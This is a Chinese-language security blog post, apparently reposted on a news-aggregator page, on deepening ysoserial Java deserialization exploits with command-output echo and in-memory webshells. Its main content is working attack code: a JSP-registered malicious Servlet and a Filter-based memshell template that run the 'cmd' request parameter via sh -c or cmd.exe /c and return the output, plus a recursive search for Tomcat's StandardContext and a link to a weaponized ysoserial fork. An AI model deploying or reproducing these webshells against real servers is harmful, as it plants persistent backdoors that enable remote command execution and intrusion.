基于ysoserial的深度利用研究(命令回显与内存马)

您所在的位置:网站首页 exe加载到内存中才能执行 基于ysoserial的深度利用研究(命令回显与内存马)

基于ysoserial的深度利用研究(命令回显与内存马)

2023-03-24 10:10| 来源: 网络整理| 查看: 265

0 分享至

用微信扫码二维码

分享至好友和朋友圈

0x01 前言

很多小伙伴做反序列化漏洞的研究都是以命令执行为目标,本地测试最喜欢的就是弹计算器,但没有对反序列化漏洞进行深入研究,例如如何回显命令执行的结果,如何加载内存马。

在上一篇文章中↓↓↓

记一次反序列化漏洞的利用之路

遇到了一个实际环境中的反序列化漏洞,也通过调试最终成功执行命令,达到了RCE的效果。在实际的攻防场景下,能执行命令并不是最完美的利用场景,内存马才是最终的目标。本篇文章就在此基础上讲一讲如何进行命令回显和加载内存马。

0x02回显

在研究基于反序列化利用链的回显实现之前,首先解决基于反序列化利用链的回显实现,也就是在响应结果中输出命令执行的结果。对PHP语言熟悉的小伙伴可能会觉得这并不算问题,直接echo不就行了,java里面是不是也应该有类似的函数例如out.println()。Java是一种面向对象的编程语言,所有的操作都是基于类和对象进行,如果要在页面响应中输出内容,必须要先有HttpServletResponse对象,典型的把命令执行结果响应到页面的方式如图2.1所示。

图2.1 通过HttpServletResponse对象输出命令执行结果

从图2.1可以看出最简单的命令执行,也需要比较复杂的代码逻辑,也就要求利用链中必须要支持执行复杂语句。并不是所有的ysoserial利用链都能达到回显和内存马的效果,只有支持复杂语句的利用链才能回显和内存马,如表2.1所示。

表2.1 ysoserial利用链中对复杂语句的支持

我们先以CommonsBeanutils1利用链来进行分析,其他CommonsCollections利用链本质上是一样的,CommonsBeanutils1链和CommonsCollections链最终都是xalan库来动态加载字节码,执行复杂语句。关于xalan利用链的分析网上有很多文章,这里暂不做分析。

要实现反序列化利用链的结果回显,最重要的是要获取到HttpServletRequest对象和HttpServletResponse对象,根据目标环境的不同,获取这两个对象的办法是不一样的,如图2.2,图2.3所示。

图2.2 SpringBoot环境下获取request和response对象

图2.3 SpringMVC环境下获取request和response对象

不同的服务器获取这两个对象的方式不一样,其他例如Weblogic、Jboss、Websphere这些中间件获取这两个对象的方式也不一样,这种差异化极大的增加了反序列化回显和内存马实现的难度。

有没有一种比较通用的办法能够获取到request和response对象呢?答案是有的,基于Thread.CurrentThread()递归搜索可以实现通用的对象查找。目前测试环境是SpringMVC和SpringBOOT,其他环境暂未测试。

Thread.CurrentThread()中保存了当前线程中的全局信息,系统运行环境中所有的类对象都保存在Thread.CurrentThread()。用于回显需要的request和response对象可以在Thread.CurrentThread()中找到;用于内存马实现的StandardContext对象也可以找到。

递归搜索的思路就是遍历Thread.CurrentThread()下的每一个字段,如果字段类别继承自目标类(例如javax.servlet.http.HttpServletRequest),则进行标记,否则继续遍历。如图2.3的方式是在已知目标类的位置获取目标类对应对象的方式,我们的改进办法是在未知目标类位置的情况下,通过遍历的方式来发现目标类对象。

其中关键的代码如图2.4所示,完整的代码见github项目地址。其中最关键的步骤是通过递归的方式来查找Thread.CurrentThread()的所有字段,依次判断字段类型是否为javax.servlet.http.HttpServletRequest和javax.servlet.http.HttpServletResponse。

图2.4 通过递归方式来查找request和response对象

使用这种方式的好处是通用性高,而不需要再去记不同服务器下对象的具体位置。把这种方式保存为一条新的利用链CommonsBeanutils1Echo,然后就可以在兼容SpringMVC和SpringBoot的环境中使用相同的反序列化包,如图2.5,图2.6所示。

图2.5 生成payload

图2.6 使用生成的payload进行反序列化测试

0x03 内存马

内存马一直都是java反序列化利用的终极目标,内存马的实现方式有很多种,其中最常见的是基于Filter的内存马,本文目标也是通过反序列化漏洞实现通用的冰蝎内存马。

基于Filter型的内存马实现步骤比较固定,如果是在jsp的环境下,可以使用下面的方式来生成内存马。

// 创建恶意Servlet

Servlet servlet = new Servlet() {

@Override

public void init(ServletConfig servletConfig) throws ServletException {

@Override

public ServletConfig getServletConfig() {

return null;

@Override

public void service(ServletRequest servletRequest, ServletResponse servletResponse) throws ServletException, IOException {

String cmd = servletRequest.getParameter("cmd");

boolean isLinux = true;

String osTyp = System.getProperty("os.name");

if (osTyp != null && osTyp.toLowerCase().contains("win")) {

isLinux = false;

String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};

InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();

Scanner s = new Scanner(in).useDelimiter("\\a");

String output = s.hasNext() ? s.next() : "";

PrintWriter out = servletResponse.getWriter();

out.println(output);

out.flush();

out.close();

@Override

public String getServletInfo() {

return null;

@Override

public void destroy() {

// 获取StandardContext

org.apache.catalina.loader.WebappClassLoaderBase webappClassLoaderBase =(org.apache.catalina.loader.WebappClassLoaderBase) Thread.currentThread().getContextClassLoader();

StandardContext standardCtx = (StandardContext)webappClassLoaderBase.getResources().getContext();

// 用Wrapper对其进行封装

org.apache.catalina.Wrapper newWrapper = standardCtx.createWrapper();

newWrapper.setName("pv587");

newWrapper.setLoadOnStartup(1);

newWrapper.setServlet(servlet);

newWrapper.setServletClass(servlet.getClass().getName());

// 添加封装后的恶意Wrapper到StandardContext的children当中

standardCtx.addChild(newWrapper);

// 添加ServletMapping将访问的URL和Servlet进行绑定

standardCtx.addServletMapping("/pv587","pv587");

访问上面的jsp文件,然后就可以删除文件,访问内存马了,如图3.1所示。

图3.1 通过jsp文件来实现内存马

上面的代码是最初级的内存马实现,通过jsp文件来实现的命令执行的内存马。由于本文的重点不是讲内存马的原理,所以代码原理简单在注释中说明,如果需要详细的原因可以参考其他专门讲内存马的文章。在反序列化环境下实现冰蝎的内存马要比这个复杂很多,但是其中一些本质上的步骤是不变的。

内存马实现种最关键的是要获取StandardContext对象,然后基于这个对象来绑定Wrapper。不同的环境下获取StandardContext对象的方式不一样,与上面步骤回显的方式一致,也可以通过递归搜索的方式从Thread.CurrentThread()中查找,把上面内存马的实现放在递归搜索的模版中实现如下所示。

package ysoserial.template;

import org.apache.catalina.Context;

import org.apache.catalina.core.ApplicationFilterConfig;

import org.apache.catalina.core.StandardContext;

import org.apache.catalina.deploy.FilterDef;

import org.apache.catalina.deploy.FilterMap;

import javax.servlet.*;

import java.io.IOException;

import java.io.InputStream;

import java.io.PrintWriter;

import java.lang.reflect.Constructor;

import java.util.HashSet;

import java.lang.reflect.Array;

import java.lang.reflect.Field;

import java.util.*;

public class DFSMemShell {

private HashSet set = new HashSet();

private Object standard_context_obj;

private Class standard_context_clazz = Class.forName("org.apache.catalina.core.StandardContext");

public DFSMemShell() throws Exception {

StandardContext standardCtx = (StandardContext) standard_context_obj;

FilterDef filterDef = new FilterDef();

filterDef.setFilterName("TestFilter");

filterDef.setFilter(new Filter() {

@Override

public void init(FilterConfig filterConfig) throws ServletException {

@Override

public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {

String cmd = servletRequest.getParameter("cmd");

boolean isLinux = true;

String osTyp = System.getProperty("os.name");

if (osTyp != null && osTyp.toLowerCase().contains("win")) {

isLinux = false;

String[] cmds = isLinux ? new String[]{"sh", "-c", cmd} : new String[]{"cmd.exe", "/c", cmd};

InputStream in = Runtime.getRuntime().exec(cmds).getInputStream();

Scanner s = new Scanner(in).useDelimiter("\\a");

String output = s.hasNext() ? s.next() : "";

PrintWriter out = servletResponse.getWriter();

out.println(output);

out.flush();

out.close();

@Override

public void destroy() {

standardCtx.addFilterDef(filterDef);

Constructor constructor = ApplicationFilterConfig.class.getDeclaredConstructor(Context.class, filterDef.getClass());

constructor.setAccessible(true);

ApplicationFilterConfig applicationFilterConfig = (ApplicationFilterConfig)constructor.newInstance(standardCtx, filterDef);

Field field = standardCtx.getClass().getDeclaredField("filterConfigs");

field.setAccessible(true);

Map applicationFilterConfigs = (Map) field.get(standardCtx);

applicationFilterConfigs.put("TestFilter", applicationFilterConfig);

FilterMap filterMap = new FilterMap();

filterMap.setFilterName("TestFilter");

filterMap.addURLPattern("/btltest");

//动态应用FilterMap

standardCtx.addFilterMap(filterMap);

public Object getStandardContext(){

return standard_context_obj;

public void search(Object obj) throws IllegalAccessException {

if (obj == null){

return;

if (standard_context_obj != null){

return;

if (obj.getClass().equals(Object.class) ) {

return;

if (standard_context_clazz.isAssignableFrom(obj.getClass())){

System.out.println("Found standardContext");

standard_context_obj = obj;

return;

if (obj.getClass().isArray()) {

for (int i = 0; i < Array.getLength(obj); i++) {

search(Array.get(obj, i));

} else {

Queue q = getAllFields(obj);

while (!q.isEmpty()) {

Field field = (Field) q.poll();

field.setAccessible(true);

Object fieldValue = field.get(obj);

if(standard_context_clazz.isAssignableFrom(fieldValue.getClass())){

System.out.println("Found standard context1");

standard_context_obj = fieldValue;

else{

search(fieldValue);

public Queue getAllFields(Object obj) throws IllegalAccessException {

Queue queue = new LinkedList();

for (Class clazz = obj.getClass(); clazz != null; clazz = clazz.getSuperclass()) {

Field[] fields = clazz.getDeclaredFields();

for (Field f : fields) {

if (f.getType().isPrimitive()) {

continue;

} else if (f.getType().isArray() && f.getType().getComponentType().isPrimitive()) {

continue;

} else {

f.setAccessible(true);

Object fieldValue = f.get(obj);

if (fieldValue != null) {

int hashcode = fieldValue.hashCode();

if (set.contains(hashcode)) {

} else {

set.add(hashcode);

queue.offer(f);

return queue;

以上面的类为模版,通过xalan链动态字节码加载的方式来生成对应的类对象,会自动这个类中的构造函数,本来逻辑上是没有问题的。但是在实际测试过程中却一直不能成功,后来找到了问题的根源,通过xalan来加载类对应的字节码文件是单个文件,如果类中有内部类或者匿名内部类,则会加载失败。

通过把动态生成的字节码保存到任意class文件,查看文件内容如图3.2所示。从图中可以看出原本定义的Filter类型的匿名内部类变成了”new1(this)”。

图3.2 动态生成的字节码文件中没有匿名内部类的内容

本来不知道怎么办,但是转念一想,通过反序列化来实现内存马早已经有大佬实现,肯定是有办法解决这个问题的。在项目https://github.com/WhiteHSBG/JNDIExploit中提供了多种环境下实现内存马的方式,如图3.3所示。

图3.3 通过反射的方式来动态加载字节码

如图3.3所示,通过反射的方式来生成Filter类型的对象,避免了使用内部类和匿名内部类,这确实是一个高明的技巧。既然有前辈的足迹,我们直接就可以占在巨人的肩膀上,把JNDIExploit中关于内存马实现的部分拷贝到我这里的反序列化模板中。注意,这里在实现冰蝎内存马的时候同样存在内部类问题,冰蝎中的内部类也需要通过反射的方式来实现。

在实际使用中,还有两个问题需要修改,其中第一个是动态加载字节码运行其中的equals方法,调用方式有问题,如图3.4,图3.5所示。

图3.4 JNDIExploit中加载调用equals方法

图3.5 修改后加载调用equals方法

另一个问题是对于SpringBootinterceptor拦截器内存马,在响应的时候必须明确指定状态码为200,不然冰蝎的客户端会连不上,如图3.6所示。

图3.6 设置状态码为200

这样之后就可以通过反序列化xalan执行复杂语句生成内存马,详细的代码参考https://github.com/webraybtl/ysoserialbtl,如图3.7所示。

0x04 结论

内存马的实现其实是挺复杂的过程,不同环境下实现方式并不完全一样,通过递归搜索的方式可以简化我们寻找特定对象的方式,并具有更高的兼容性。

完整代码已经放在↓↓↓

https://github.com/webraybtl/ysoserialbtl

CC链不支持复杂语句,并不是一定的,在某些情况下也可以让其支持,比如通过ScriptEngineManager加载js解析引擎来执行复杂语句。这会是一种更通用的实现内存马的方式吗?还有待研究。

特别声明:以上内容(如有图片或视频亦包括在内)为自媒体平台“网易号”用户上传并发布,本平台仅提供信息存储服务。

Notice: The content above (including the pictures and videos if any) is uploaded and posted by a user of NetEase Hao, which is a social media platform and only provides information storage services.

/阅读下一篇/ 返回网易首页 下载网易新闻客户端


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3